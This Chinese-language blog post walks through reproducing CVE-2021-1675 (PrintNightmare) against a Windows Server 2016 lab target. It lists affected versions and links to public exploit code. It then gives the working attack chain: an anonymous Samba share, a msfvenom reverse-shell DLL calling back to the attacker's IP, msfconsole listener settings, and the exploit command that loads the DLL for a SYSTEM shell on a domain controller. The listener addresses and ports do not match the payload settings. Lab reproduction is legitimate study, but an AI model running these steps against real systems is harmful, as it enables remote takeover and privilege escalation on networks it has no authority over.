漏洞概述
Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的打印机将使用哪个驱动程序的信息。另一个参数,dwFileCopyFlags指定如何复制替换打印机驱动程序文件。攻击者可以利用任何经过身份验证的用户都可以调用RpcAddPrinterDriverEx()并指定位于远程服务器上的驱动程序文件这一事实。这会导致 Print Spooler 服务spoolsv.exe以 SYSTEM 权限执行任意 DLL 文件中的代码。
影响版本
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
工具
Poc: GitHub - cube0x0/impacket: Impacket is a collection of Python classes for working with network protocols.
Exp: https://github.com/cube0x0/CVE-2021-1675
攻击机:kali2022
靶机:windows sever 2016
漏洞复现
(1)在域中创建一个新用户
文章来源地址https://www.toymoban.com/news/detail-462195.html
(2)在命令行中输入 net user 查看用户是否添加成功
(3)net user wuhu 查看用户数据
(4)打开Print Spooler服务
(5)使用kali运行poc
cd impacket
python3 ./setup.py install
(6)开启匿名访问SMB
Vim /etc/samba/smb.comf
在smb.conf末尾添加force user = nobody
(7)配置完后,开启SMBD
service smbd start
(8)查看是否能够连接
(9)在共享目录tmp下通过msfvenom生成.dll文件木马
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.2 lport=9999 -f dll -o reverse.dll
LHOST 是Kali的IP ,LPORT设置为9999 ,生成的反弹shell放在了TMP文件夹下
(10)利用msfconsole开启监听
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.130 (kali的ip地址)
set lport 443
- 通过使用EXP进行利用
python3 CVE-2021-1675.py 用户名:密码@192.168.56.136 '\\192.168.56.130\smb\reverse.dll'
成功反弹shell并获取到域控system权限,利用成功
文章来源:https://www.toymoban.com/news/detail-462195.html
到了这里,关于CVE-2021-1675 Windows Print Spooler权限提升漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
